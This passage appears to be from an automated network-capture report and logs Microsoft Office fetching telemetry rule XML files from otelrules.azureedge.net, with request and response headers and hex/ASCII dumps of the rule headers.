                                                                                                                                                                                                        2024-12-04 12:53:50 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        99192.168.2.74982613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:51 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                        x-ms-request-id: d1823508-801e-008c-16d3-457130000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125351Z-1746fd949bdtlp5chC1EWRq1v4000000018000000000350z
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        100192.168.2.74982713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:51 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                        x-ms-request-id: 4927bbd2-c01e-000b-53cc-45e255000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125351Z-1746fd949bdjrnwqhC1EWRpg2800000001bg000000003bak
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        101192.168.2.74982813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:51 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                        x-ms-request-id: 8db94728-c01e-0034-79d1-452af6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125351Z-1746fd949bdfg4slhC1EWR34t00000000110000000009mu7
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        102192.168.2.74982913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:51 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                        x-ms-request-id: c43eeb18-901e-008f-6ecb-4567a6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125351Z-1746fd949bdfg4slhC1EWR34t00000000160000000001ysh
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:51 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        103192.168.2.74983013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:52 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:52 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                        x-ms-request-id: dea1083a-301e-0051-14cb-4538bb000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125352Z-1746fd949bdjrnwqhC1EWRpg28000000015g00000000bhsc
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:52 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        104192.168.2.74983213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:53 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:53 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                        x-ms-request-id: 55cb7248-101e-0017-4fd4-4547c7000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125353Z-1746fd949bdw2rg8hC1EWR11u400000001c000000000bfbh
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:53 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        105192.168.2.74983313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:53 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:54 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                        x-ms-request-id: ddb132fa-c01e-008d-18cc-452eec000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125354Z-1746fd949bd9x4mhhC1EWRb76n000000015000000000byky
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:54 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        106192.168.2.74983413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:53 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:54 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                        x-ms-request-id: 5ce939f7-901e-00ac-7ec7-45b69e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125354Z-1746fd949bdlnsqphC1EWRurw00000000100000000009s3s
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:54 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        107192.168.2.74983513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:54 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:54 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                        x-ms-request-id: 4ebcc1fc-101e-0028-09cb-458f64000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125354Z-1746fd949bdqpttnhC1EWRe1wg000000011g000000002ph6
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:54 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        108192.168.2.74983613.107.246.63443
